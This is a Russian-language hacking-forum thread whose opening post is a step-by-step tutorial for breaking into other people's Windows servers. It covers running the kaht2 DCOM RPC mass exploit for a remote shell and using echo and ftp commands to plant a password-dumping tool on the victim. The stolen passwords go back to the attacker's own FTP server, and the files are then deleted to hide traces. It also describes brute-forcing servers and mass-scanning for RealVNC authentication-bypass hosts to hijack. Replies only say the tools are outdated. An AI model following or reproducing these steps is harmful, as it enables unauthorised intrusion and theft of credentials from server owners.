Использование экплоита kaht2 и другие методы в атаке на Dedical сервера.

Discussion in 'Безопасность и Анонимность' started by Xcontrol212, 20 May 2008.

  1. Xcontrol212

    Xcontrol212 Elder - Старейшина

    Joined:
    13 Feb 2008
    Messages:
    253
    Likes Received:
    110
    Reputations:
    7
    1.эксплоит который мы рассмотрим это kaht2...........
    Для того,чтобы прваильно заюзать эксплоит нам нужна программа PassViev (только PRO версия):aggressive:,pablos_ftp_server
    1.52
    ну и сакм кахт2
    Для удобства пользования Размещаем софт по винту в определённом порядке. Сам FTPServer, kaHt2.exe и EXPORT.BAT ставим в директорию C:/., А PassViev cуём в папку C:/TEMP (Если её нет, то создайте сами) и переименовываем PassViev.exe в 6.exe (для большего удобства), или в любое другое, на ваш выбор, главное что бы вы потом не мучались набирать это в командной строке.

    EXPORT.BAT должен находится в одном архиве с КаХтом, если же всё-таки не нашли то создаём EXPORT.BAT файл своими руками в любимом блокноте с текстом

    @Echo off
    6.exe Export.txt

    и сохраняем как EXPORT.BAT. Всё Батник готов. Заметьте: во второй строке стоит 6.exe, это то имя в которое вы переименовали свой PassViev. Если Вы переименовали в другое то в напишите именно его в батнике EXPORT.BAT.

    Теперь давайте настроим FTP сервер на своём компутере. Запустите FTPServer и войдите в User accounts, нажимаем ADD, Вас просят ввести имя юзера, пишем: a. Далее вас просят выбрать каталог куда будут заливатся стыренные файлы, выберете папку темп которую мы недавно с Вами создавали на диске ЦЕ. Потом Вас просят ввести пароль для юзера a, парольставим тоже: a. Потом проставляем везде галочки. Теперь все изменения сохраняем и приступаем к основным действиям.

    Открываем диск C:, убеждаемся что там присутствует КаХт. Потом Запускаем командную строку (пуск>программы>стандартные>командная строка). Перетаскиваем КаХт с папки в комндную строку (нажмите на КаХт левой кнопкой мыши и перетеащите в окно консоли).
    Далее появляется текст: C:>C:kahHt2.exe
    Продолжаем эту строку: пробел
    Должно получится: C:>C:kaHt2.exe 192.168.0.1 192.168.0.245 (пример на моей локалке, у Вас же диапазон может быть другой)
    Жмём Enter.
    Перед Вами появляется:
    PHP:
    KAHT II MASSIVE RPC EXPLOIT
    DCOM RPC exploit
    Modified by aT4@3wdesign.es
    #haxorcitos && #localhost @Efnet Ownz you!!!
    PUBLIC VERSION :P
    ____________________________________________
    [+] tARGETS 192.168.0.1-192.168.0.245 WITH 50 tHREADS
    [+] Attacking Port135. Remote Shell port32968
    [+] Scan In Progress...
    Connecting to 192.168.0.8
    Sending Exploit to a 
    [WinXPServer... FAILED
    Connecting to 192.168.0.13

    ну короче говоря ещё всякое дерьмо появится которое нам не надо
    В итоге когда сканер найдёт потенциальную жертву появится :

    Microsoft Windows XP [Версия 5.1.2600]
    (
    СКорпорация Майкрософт1985-2001.
    C
    :windowssystem32>

    Всёможешь радоватьсяты на чужом компе в директории SYSTEM32.
    Далее в консоли пишем:
    cd.. Жмём Enter видим C:windows>
    cd..Жмём Enter видим C:

    Теперь с помощью команды cd program files перейдём в папку С:Program Files.
    Видим:
    C:Program files сюда мы перешли чтоб особо не палится
    Далее узнаём свой IP адрес
    Для премера будем использовать мой в локалке 192.168.0.7
    Пишем в консоли
    :
    C:Program files>echo open 57.66.158.44>go.txt&&echo a>>go.txt&&echo a>>go.txt 
    жмем Enter
    Видим
    C:Program files>
    Это мы с Вами создали текстовый документ (он нам понадобится для соединения с вашим FTP серверомв папке Program files на удалённой машинев котором содержится 3 строки:
    open 57.66.158.44
    a
    a
    Буквы a
    это имя и пароль которые Вы создали в FTPServer`е.

    Теперь запускаем FTPServer , нажимаем на зелёную стрелочку в левом верхнем углу программы. Вам написали, что сервер запущен.
    Теперь коннектим удалённый комп к себе по FTP.
    Пишем в командной строке:
    C:Program files>ftp -s:go.txt
    В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:

    FTP Server started on port 21
    [3892] Client connected from IP
    [3892] Welcome to Pablo's FTP Server
    [3892] USER a
    [3892] 331 Password required for a
    [3892] PASS a
    [3892] 230 User successfully logged in.

    Это всё означает, что ты всё правильно сделал и законнектил вражеский комп к себе на ФТП, далее на надо залить PAssView.exe (мы переименовали его в 6.exe) на этот комп.
    Пишем get 6.exe жмём Enter
    В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:
    [1456] PORT IP
    [1456] 200 Port command successful.
    [1456] STOR 6.exe
    [1456] 150 Opening BINARY mode data connection for file transfer
    [1456] 226 Transfer complee

    В консоли Пишем get export.bat жмём Enter - это мы отправили наш батник, видим В своём FTP сервере, в раздел Server Log ты должен увидеть следующее
    [1456] PORT IP
    [1456] 200 Port command successful.
    [1456] STOR Export.bat
    [1456] 150 Opening BINARY mode data connection for file transfer
    [1456] 226 Transfer complee

    Всё, мы отправили необходимые файлы на комп жертвы.
    Теперь пишем bye - это мы отсоединяем комп от нашего ФТП сервера.

    и снова мы видим:
    C:Program files>
    Пишем C:Program files>export.bat это мы запустили export.bat который соберёт нам все наши пароли и сохранит их в файле export.txt
    Для больше уверенности в том что export.txt уже создан наберите в консоли:
    C:Program files>dir
    И Вы увидите все файлы и папки в директории C:Program files, там же увидите и наши закаченные файлы.

    И наконец последний шаг.
    Снова коннектим комп по ФТП:
    C:Program files>ftp -s:go.txt жмём Enter
    В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:
    Вы снова увидите:
    FTP Server started on port 21
    [3892] Client connected from IP
    [3892] Welcome to Pablo's FTP Server
    [3892] USER a
    [3892] 331 Password required for a
    [3892] PASS a
    [3892] 230 User successfully logged in.

    Сразу после этого в консоли вводите:
    send export.txt
    В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:
    [1456] PORT IP
    [1456] 200 Port command successful.
    [1456] STOR export.txt
    [1456] 150 Opening BINARY mode data connection for file transfer.
    [1456] 226 Transfer complete

    Это означает что мы скопривали себе в папку TEMP,которую создавали на диске ЦЕ, файл export.txt

    Далее заметаем следы:
    пишем bye жмём ввод
    И снова видим: 
    C:Program files>
    Далее поочерёдно вводим команды для удаления закаченных нами файлов:
    del go.txt
    del 6.exe
    del export.bat
    del export.txt
    Скачать кахт можнотут

    2.Брут дедиков
    Как мы все знаем брутер это самый эффективный и тупой метод взлом асек,дедиков and etc
    Рассмотрим некоторые брутеры дедиков:
    Самый известный брутер для дедиков это Ntscan
    Делает она следующее: при выборе определённого диапазона она сканирует сервера на предмет простых паролей (simple passwords). Программа имеет довольно неплохой выбор метода атаки, и вероятность взлома сервером с её помощью очень велика, так как админы часто ставят простые пароли к серверу, особенно на забугорных. Прога работает по принципу брута: посылает запрос на авторизацию на сервере и получает ответ от севера. В случае успешной авторизации выводит список серверов в нижней части программы. Теперь главное выбрать диапазон сканирования и настроить программу для эффективной работы. Сверху мы вписываем диапазон IP серверов, как вы наверно уже поняли. Далее, HostFile - список хостов (я не использовал эту опцию), здесь можно создать файл с конкретными хостами и брутить конкретные хосты. Потоки я оставлял как есть: 50, Timeout - аналогично. ConnectShare - подключение к расшаренным ресурсам. Можно выбирать метод атаки: IPCscan, SMBscan, WMIscan. Далее, "ping from host" - пинговать хосты, то есть проверка на живучесть хоста, перед попыткой атаки, чтобы не брутить в холостую мёртвые хосты. Scan host opened port - сканировать хосты с открытым портом 139, но так же можно и изменить при желании. Speed - скорость работы брута (перебора паролей).
    TSGrinder 2.03
    Программа для подбора паролей к MS RDP службе. Поддерживает множество потоков, баннеры входа в систему, l33t преобразование. Программа требует установки Microsoft Simulated Terminal Server Client tool, "roboclient".
    DownLoad
    Также дедики можно брутить прогой Hydra
    3.[/B]Добыча дедиков от Te$t[/B]
    Первое, что нам нужно это прямые руки, свежая или чуть пьяная голова =)
    FreeCap - Предназначен для соксификации программ не умеющих работать с
    прокси серверами самостоятельно. Пару SOCKS-проксов для безопасности, а
    лучше цепочку . Здесь я не буду описывать принцип работы с этой программой,
    но вы знайте, что все действия я проделываю именно через нее...

    Начнем.

    Искать мы будем vnc-server т.е. Virtual Network Computing.
    Первое что нам нужно, это хороший VNC-сканер, я знаю 2 сканера:
    это PHP-сканер от Гемаглобина и RealVNC Bypass Authentication Scanner
    Свой выбор я оставил за RealVNC Bypass Authentication Scanner,
    т.к. он прост в использовании и реально ищет по диапазонам, а нам это и нужно. Итак скачиваем данный сканер, распаковываем его к примеру в: X:\XXX\ где Х - буква вашего диска, а ХХХ - папка куда вы его распаковали. И запускаем из cmd.exe Пример:
    cd X:\XXX - переходим в папку со сканером
    Х:\XXX\VNC.exe - запускаем сканер,
    где он нам выдаст следущую информацию:
    Code:
    Microsoft Windows XP [Версия 5.1.2600]
    (С) Корпорация Майкрософт, 1985-2001.
    X:\>VNC.exe
    
    ================================================[rev-0.0.1]==
    ========RealVNC <= 4.1.1 Bypass Authentication Scanner=======
    ============multi-threaded for Linux and Windows=============
    ================================================== ==[win32]==
    MAIN MENU
    ================================================== ===========
    
    [+] Usage: VNC_bypauth <target> <scantype> <option>
    [-] <target>:
    ___________________
    |___-p____|___-i____|
    
    [-] <scantype>:
    ____________________
    |___-cT___|___-vnc___|
    [-] <option>:
    __________________________________________________ ______
    |___-v____|___-vv____|___-T___|__-tc___|__-tr___|__-tt___|
    
    [+] Type VNC_bypauth <target>,<scantype> or <option> for more informations
    [+] To increase the speed under linux, try ulimit -s unlimited
    
    X:\>
    Осюда мы видим набор ключей по работе со сканером...
    Вбиваем далее:
    X:\XXX\VNC.exe -i XXX.XXX.XXX.XXX-XXX.XXX.XXX.XXX -p5900 -vnc
    где: -i диапазон ip -р порт -vnc Виртуальные сервера
    В то-же время в папке \ХХХ\ у нас появляеться файл VNC_bypauth.txt,
    куда сохраняются все результаты программы. Открываем и видим:
    Code:
    ---------------------------------------------------------------------------
    COMMAND: VNC.exe -i xxx.xx.xxx.x-xxx.xxx.xxx.xxx -p 5900 -vnc
    ----------------------------------------------------------------------------
    xxx.xx.xxx.xx :5900 vnc4: banned
    xxx.xx.xxx.xx :5900 vnc4: nothing received
    xxx.xx.xxx.x :5900 connection closed
    xxx.xx.xxx.xxx :5900 vnc4: patched
    xxx.xx.xxx.xxx :5900 vnc4: VULNERABLE
    ----------------------------------------------------------------------------
    Scan complete
    --------------------------------------------[heapoverflow.com 2004-2005]----
    
    из результата видно, что сканер понятным образом сохраняет результаты, где бажные
    сервера подписаны как VULNERABLE, с такими мы и будем работать...
    Теперь к нам на помощь приходит программа BL4CK-vncviewer-authbypass она
    позволяет подключится к бажному серверу, на подобии
    Подключение к удаленному рабочему столу(mstsc.exe)

    Способ №2

    Ищем и качаем программу DSNS v. 1.0
    [​IMG]
    очень хороший между прочим сканер портов .
    Вбиваем диапазон, порт и ждем, через некоторое время сканер
    выдает нам много открытых портов =). После окончания сканировнаия, сохраняем
    данный диапазон в Results\Export results одним диапазоном, без портов.
    Теперь настала очередь программы VNCMASS, в которую мы вбиваем только что
    насканеные диапазоны и давим Start All. Программа прочекает и автоматически подключиться к бажным дедикам.. Вот и все.
    Советую работать со сканерами через дедики, т.к. вбили диапазон и пошли спать, а наутро подключились и смотрим результаты.

    Ссылки на скачивание:
    RealVNC Bypass Authentication Scanner
    DSNS v. 1.0


    (С)Собрал способы DUN
     
    6 people like this.
  2. iv.

    iv. Elder - Старейшина

    Joined:
    21 Mar 2007
    Messages:
    1,183
    Likes Received:
    438
    Reputations:
    107
    Tab клавиша есть. Дальше читать неинтересно. =(
     
  3. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    ТС, ты бы сначала тему топика правильно написал.. вообще то не Dedical сервер, а Dedicated сервер... написано много, но все это уже давно есть.. да и тулзы слишком стары...
     
  4. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    Он года 3-5 назад был актуальным :)